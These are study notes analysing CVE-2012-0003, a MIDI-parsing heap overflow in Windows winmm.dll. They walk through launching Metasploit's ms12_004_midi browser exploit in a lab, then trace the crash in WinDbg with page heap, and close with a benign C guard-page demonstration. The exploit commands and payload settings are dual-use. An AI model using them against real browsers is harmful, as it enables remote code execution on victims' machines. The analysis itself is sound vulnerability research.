
Study notes on CVE-2012-0003 from 《漏洞战争》 (Vulnerability Wars)


Study notes on CVE-2012-0003 from 《漏洞战争》. This vulnerability is a heap overflow caused by improper data handling in Microsoft's multimedia library winmm.dll (c:\windows\system32\winmm.dll) when it processes MIDI files; an attacker can embed a specially crafted MIDI file in a web page to execute arbitrary code remotely.

0x01 Preparation

Use the exploit module in msf (the last two lines are the module's output):

msfconsole
search cve-2012-0003
use exploit/windows/browser/ms12_004_midi
set uripath test.html
set payload windows/exec
set cmd calc.exe

server started
http://192.168.118.129:8080/test.html

Strangely, no test.html exists on the system, yet visiting the generated link does indeed trigger the exploit. Later I looked at the msf exploit ms12_004_midi.rb, where the code that generates the HTML is:

send_response(cli, html, {'Content-Type'=>'text/html'})

The send_response function is used in the msf API as follows:

[image: msfapi_send_response]

In other words, msf's built-in web server sends the HTML to the client through send_response, which is what makes the link http://192.168.118.129:8080/test.html reachable.

This approach is rather special; perhaps msf's web side is built on some Ruby web framework similar to Python's Django.

0x02 Debugging and analysis

Open iexplore.exe, then Win+R, cmd:

gflags -i iexplore.exe +hpa

Setting !gflag +hpa from inside WinDbg does not take effect here, possibly a WinXP or WinDbg issue. In WinDbg, press F6 and attach to iexplore.exe:

!gflag
0:016> !gflag
Current NtGlobalFlag contents: 0x02000000
hpa - Place heap allocations at ends of pages
g
Open in IE: http://192.168.118.129:8080/test.html
(180.6f8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000419 ebx=00000073 ecx=0073b29f edx=00000000 esi=16a7f019 edi=16a7cf60
eip=76b2d224 esp=3685fe80 ebp=3685fea0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
WINMM!midiOutPlayNextPolyEvent+0x1ec:
76b2d224 8a06 mov al,byte ptr [esi] ds:0023:16a7f019=??

At this point all we know is that there is a memory access violation at 76b2d224; to write an exploit we still need to understand how the parameters are passed. The exploitation of this heap-overflow CVE is not a DWORD SHOOT but rather cleverly crafted HTML that gains control of eip. If one were exploiting the heap overflow in the usual way, the idea at the access violation above would be to find a DWORD SHOOT opportunity to overwrite the address of an exception-handling-related function and thereby control eip, and one would also need to find the heap allocation call that happens after the controllable data has been copied into memory. Win+R, cmd:

gflags -i iexplore.exe -hpa
bu WINMM!midiOutPlayNextPolyEvent
g
Open in IE: http://192.168.118.129:8080/test.html
Breakpoint 0 hit
eax=00000000 ebx=ffffffff ecx=7ffdf000 edx=00216790 esi=00216780 edi=002167d8
eip=76b2d038 esp=0012e5b0 ebp=0012e5dc iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
WINMM!midiOutPlayNextPolyEvent:
76b2d038 8bff mov edi,edi
It breaks here. Now check whether WINMM!midiOutPlayNextPolyEvent+0x1ec raises an access violation without +hpa:
bu WINMM!midiOutPlayNextPolyEvent+0x1ec
g
Breakpoint 0 hit
eax=00000251 ebx=0000007f ecx=007f2399 edx=00000000 esi=046de111 edi=025cd4f0
eip=76b2d224 esp=0393fe80 ebp=0393fea0 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
WINMM!midiOutPlayNextPolyEvent+0x1ec:
76b2d224 8a06 mov al,byte ptr [esi] ds:0023:046de111=00
It breaks here as well, and the [esi] seen here differs from the [esi] at the access violation above. Enabling page heap appends a dedicated guard page after each heap block so that an overflow raises an exception the moment it touches that page; given that, the difference in [esi] between +hpa and -hpa should not be caused by page heap itself. My guess is that WINMM!midiOutPlayNextPolyEvent+0x1ec is executed several times: when it is first reached, [esi] is readable; on some later pass through +0x1ec the exploit data prepared by msf has changed [esi], and under +hpa that [esi] falls within the address range of the guard page added by page heap, which is why one particular pass through +0x1ec raises an access violation under +hpa. To verify this idea, do the following. Close WinDbg, reopen IE, then at cmd:
gflags -i iexplore.exe +hpa
Open WinDbg, press F6 and attach to iexplore.exe:
bu WINMM!midiOutPlayNextPolyEvent+0x1ec
bu WINMM!midiOutPlayNextPolyEvent
g
Open in IE: http://192.168.118.129:8080/test.html
Breakpoint 1 hit
eax=00000000 ebx=ffffffff ecx=7ff9d000 edx=16840f70 esi=16840f60 edi=16840fb8
eip=76b2d038 esp=365bfbe0 ebp=365bfc0c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
WINMM!midiOutPlayNextPolyEvent:
76b2d038 8bff mov edi,edi
g
Breakpoint 1 hit
eax=00000000 ebx=ffffffff ecx=7ff98000 edx=16840f70 esi=16840f60 edi=16840fb8
eip=76b2d038 esp=3690fea4 ebp=3690fedc iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
WINMM!midiOutPlayNextPolyEvent:
76b2d038 8bff mov edi,edi
Here we see that the first run of WINMM!midiOutPlayNextPolyEvent never reaches +0x1ec; it returns before +0x1ec.
Breakpoint 0 hit
eax=00000251 ebx=0000007f ecx=007f2399 edx=00000000 esi=16842e51 edi=16840f60
eip=76b2d224 esp=3690fe80 ebp=3690fea0 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
WINMM!midiOutPlayNextPolyEvent+0x1ec:
76b2d224 8a06 mov al,byte ptr [esi] ds:0023:16842e51=00
Here we see that during the second run of WINMM!midiOutPlayNextPolyEvent, the first pass through +0x1ec does not raise an access violation.
Breakpoint 0 hit
eax=00000419 ebx=00000073 ecx=0073b29f edx=00000000 esi=16843019 edi=16840f60
eip=76b2d224 esp=3690fe80 ebp=3690fea0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
WINMM!midiOutPlayNextPolyEvent+0x1ec:
76b2d224 8a06 mov al,byte ptr [esi] ds:0023:16843019=??
And during the second run of WINMM!midiOutPlayNextPolyEvent, the second pass through +0x1ec does raise an access violation ([esi] is unreadable, shown as ??); running g confirms it:
(51c.674): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000419 ebx=00000073 ecx=0073b29f edx=00000000 esi=16843019 edi=16840f60
eip=76b2d224 esp=3690fe80 ebp=3690fea0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
WINMM!midiOutPlayNextPolyEvent+0x1ec:
76b2d224 8a06 mov al,byte ptr [esi] ds:0023:16843019=??

So the exception is indeed triggered: under +hpa, the access violation occurs on the second pass through +0x1ec during the second run of WINMM!midiOutPlayNextPolyEvent. What about the -hpa case? Verify it with the following steps:

Close WinDbg, reopen IE:

gflags -i iexplore.exe -hpa
Open WinDbg, press F6 and attach to iexplore.exe:
bu WINMM!midiOutPlayNextPolyEvent+0x1ec
bu WINMM!midiOutPlayNextPolyEvent
g
Open in IE: http://192.168.118.129:8080/test.html
Breakpoint 1 hit
eax=00000000 ebx=ffffffff ecx=7ffdf000 edx=0256aa28 esi=0256aa18 edi=0256aa70
eip=76b2d038 esp=0012e5b0 ebp=0012e5dc iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
WINMM!midiOutPlayNextPolyEvent:
76b2d038 8bff mov edi,edi
g
Breakpoint 1 hit
eax=00000000 ebx=ffffffff ecx=7ff98000 edx=0256aa28 esi=0256aa18 edi=0256aa70
eip=76b2d038 esp=0392fea4 ebp=0392fedc iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
WINMM!midiOutPlayNextPolyEvent:
76b2d038 8bff mov edi,edi
g
Breakpoint 0 hit
eax=00000251 ebx=0000007f ecx=007f2399 edx=00000000 esi=025cae59 edi=0256aa18
eip=76b2d224 esp=0392fe80 ebp=0392fea0 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
WINMM!midiOutPlayNextPolyEvent+0x1ec:
76b2d224 8a06 mov al,byte ptr [esi] ds:0023:025cae59=00
g
Breakpoint 0 hit
eax=00000419 ebx=00000073 ecx=0073b29f edx=00000000 esi=025cb021 edi=0256aa18
eip=76b2d224 esp=0392fe80 ebp=0392fea0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
WINMM!midiOutPlayNextPolyEvent+0x1ec:
76b2d224 8a06 mov al,byte ptr [esi] ds:0023:025cb021=00
We can see that under -hpa the second pass through +0x1ec during the second run of WINMM!midiOutPlayNextPolyEvent does not raise an access violation. Combined with what +hpa is for (locating the code or function responsible for a vulnerability), we can conclude that this instruction, on the second pass through +0x1ec in the second run of WINMM!midiOutPlayNextPolyEvent, is the one that causes the heap overflow.
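As an added example (not code from the original post or from the book it studies), here is a small C program that reproduces the page-heap behaviour relied on in the paragraph about guard pages above and in the +hpa / -hpa comparison that ends the analysis. It places a block flush against the end of a page, optionally followed by a PROT_NONE guard page (the layout gflags +hpa gives every heap block), then performs a single byte read in the style of the mov al, byte ptr [esi] at +0x1ec. With the guard page the first out-of-bounds byte faults immediately and is caught by a SIGSEGV handler; without it the same read silently returns the neighbouring byte, just as the -hpa session shows [esi] reading 00 where the +hpa session shows ??. The function names, the block size and the 0x41 filler are constructed for this example, and it uses POSIX mmap/mprotect rather than the Windows heap.

```c
#define _GNU_SOURCE
#include <setjmp.h>
#include <signal.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Set by the SIGSEGV handler when a probe read touches the guard page. */
static sigjmp_buf fault_jmp;
static volatile sig_atomic_t fault_seen;

static void on_segv(int sig)
{
    (void)sig;
    fault_seen = 1;
    siglongjmp(fault_jmp, 1); /* abandon the faulting read, restore the signal mask */
}

/*
 * Place a `size`-byte block flush against the end of a page, followed by one
 * more page. With guard != 0 that trailing page is made PROT_NONE, which is the
 * layout gflags +hpa gives heap blocks; with guard == 0 it stays readable and
 * stands in for the normal heap, where the next bytes belong to a neighbour.
 * Returns the block pointer; *mapping/*maplen describe the region to unmap.
 */
static unsigned char *place_block(size_t size, int guard, void **mapping, size_t *maplen)
{
    size_t page = (size_t)sysconf(_SC_PAGESIZE);
    size_t data_pages = (size + page - 1) / page;
    unsigned char *base;

    *maplen = (data_pages + 1) * page;
    base = mmap(NULL, *maplen, PROT_READ | PROT_WRITE,
                MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (base == MAP_FAILED)
        return NULL;
    if (guard && mprotect(base + data_pages * page, page, PROT_NONE) != 0) {
        munmap(base, *maplen);
        return NULL;
    }
    *mapping = base;
    return base + data_pages * page - size;
}

/* One byte read, like "mov al, byte ptr [esi]" at +0x1ec.
 * Returns 1 if the read faulted, 0 if it completed. */
static int probe_read(const unsigned char *block, size_t index)
{
    struct sigaction sa, old;
    const volatile unsigned char *p = block; /* volatile: the load must really happen */

    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_segv;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGSEGV, &sa, &old);

    fault_seen = 0;
    if (sigsetjmp(fault_jmp, 1) == 0) {
        unsigned char v = p[index];
        (void)v;
    }
    sigaction(SIGSEGV, &old, NULL);
    return fault_seen;
}

/*
 * Read byte `index` of a freshly placed `size`-byte block.
 *   returns  1 -> the read was caught (only possible with guard != 0)
 *   returns  0 -> the read silently completed
 *   returns -1 -> mapping failed
 */
int read_with_layout(size_t size, size_t index, int guard)
{
    void *mapping;
    size_t maplen;
    int faulted;
    unsigned char *block = place_block(size, guard, &mapping, &maplen);

    if (block == NULL)
        return -1;
    memset(block, 0x41, size); /* constructed filler standing in for MIDI event bytes */
    faulted = probe_read(block, index);
    munmap(mapping, maplen);
    return faulted;
}

int main(void)
{
    size_t size = 0x19; /* constructed block size; any size works */
    printf("in-bounds read, page heap on : faulted=%d\n", read_with_layout(size, size - 1, 1));
    printf("one-past  read, page heap on : faulted=%d\n", read_with_layout(size, size, 1));
    printf("one-past  read, page heap off: faulted=%d\n", read_with_layout(size, size, 0));
    return 0;
}
```

Build with any C compiler on a POSIX system and run; the three printed lines correspond to the in-bounds read, the one-past-the-end read with the guard page, and the one-past-the-end read without it. One caveat when mapping this back to WinDbg: full page heap rounds block sizes up to the heap's 8-byte alignment on 32-bit Windows, so an overflow shorter than that padding lands in the slack before the guard page and is only reported when the block is freed, whereas this example places the block exactly at the page end.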
